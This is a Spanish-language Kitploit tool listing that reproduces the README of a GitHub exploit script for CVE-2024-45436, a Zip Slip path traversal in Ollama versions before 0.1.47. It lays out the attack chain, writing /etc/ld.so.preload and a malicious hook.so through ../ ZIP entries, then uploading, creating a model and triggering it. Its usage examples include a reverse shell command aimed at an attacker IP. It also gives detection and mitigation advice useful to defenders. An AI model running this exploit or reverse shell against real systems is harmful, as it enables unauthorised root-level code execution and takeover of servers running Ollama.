Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-45436 — script de explotación para CVE-2024-45436 | Kitploit
Herramientas/GitHubGitHub/srcx404/cve-2024-45436
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubsrcx404/cve-2024-45436

CVE-2024-45436

script de explotación para CVE-2024-45436

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Ollama CVE-2024-45436

Una implementación de exploit limpia y eficiente para la vulnerabilidad de recorrido ZIP de Ollama (CVE-2024-45436). Documentación en chino: README_CN.md

Descripción de la vulnerabilidad

CVE-2024-45436 es una vulnerabilidad de recorrido de rutas (también conocida como "Zip Slip") en versiones de Ollama anteriores a la 0.1.47. La vulnerabilidad permite a los atacantes escribir archivos en ubicaciones arbitrarias del sistema de archivos explotando una validación incorrecta de las rutas durante las operaciones de extracción de archivos ZIP.

La falla existe en la función extractFromZipFile en el archivo model.go de Ollama, que extrae archivos de modelo. Cuando un archivo ZIP contiene entradas con rutas que incluyen secuencias de recorrido de directorios (../), Ollama extrae estos archivos fuera del directorio previsto, permitiendo potencialmente a un atacante sobrescribir archivos críticos del sistema.

Mecanismo del Exploit

Este exploit aprovecha la vulnerabilidad a través del siguiente enfoque:

  1. Crea un archivo de objeto compartido malicioso (hook.so) que contiene código de ejecución de comandos arbitrarios
  2. Lo empaqueta en un archivo ZIP especialmente diseñado con entradas de recorrido de rutas:
    • ../../../../../../../../../../etc/ld.so.preload - Usado para precargar objetos compartidos personalizados
    • ../../../../../../../../../../tmp/hook.so - El objeto compartido malicioso en sí mismo
  3. Sube el archivo ZIP a través de la API de blob de Ollama
  4. Crea un modelo que hace referencia al blob subido
  5. Desencadena la ejecución solicitando embeddings a Ollama

Cuando se ejecuta con éxito, el payload se ejecuta con los mismos permisos que el servicio Ollama, otorgando potencialmente ejecución remota de código como root.

Requisitos

  • Python 3.6+
  • Paquetes Python requeridos:
    • requests
    • argparse
  • GCC (para compilar el objeto compartido)
  • Una instancia vulnerable de Ollama (anterior a 0.1.47) ejecutándose en Linux

Uso

root@kitploit:~
python exp.py <target_url> <command>

Argumentos

  • target_url: La URL de la instancia vulnerable de Ollama (p.ej., http://example.com:11434)
  • command: El comando a ejecutar en el sistema objetivo

Opciones

  • --no-cleanup: No eliminar archivos temporales después de la explotación (útil para depuración)

Ejemplos

Uso básico:

root@kitploit:~
python exp.py http://target-server:11434 "id > /tmp/pwned"

Shell inversa:

root@kitploit:~
python exp.py http://target-server:11434 "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'"

Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado contra sistemas sin permiso explícito es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso de este software.

Detección

Las organizaciones pueden detectar si son vulnerables mediante:

  1. Verificando su versión de Ollama con /api/version
  2. Buscando archivos inesperados en /etc/ld.so.preload o /tmp/hook.so
  3. Monitoreando actividades inusuales de creación de modelos

Mitigación

  • Actualizar Ollama a la versión 0.1.47 o posterior
  • Si no es posible la actualización inmediata, restringir el acceso de red a los endpoints de la API de Ollama
  • Ejecutar Ollama con privilegios mínimos, no como root

Detalles Técnicos

La vulnerabilidad explota una validación inadecuada de rutas en el proceso de extracción de archivos ZIP de Ollama. Cuando se carga un modelo a través de la API, la aplicación extrae archivos de un archivo ZIP sin sanitizar adecuadamente las rutas de archivos, permitiendo ataques de recorrido de directorios.

El archivo ld.so.preload se utiliza en Linux para especificar bibliotecas compartidas que deben cargarse antes que todas las demás. Al escribir en este archivo, el atacante puede asegurar que su biblioteca maliciosa sea cargada por cualquier nuevo proceso, secuestrando efectivamente la ejecución del programa.

Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

Descargar herramienta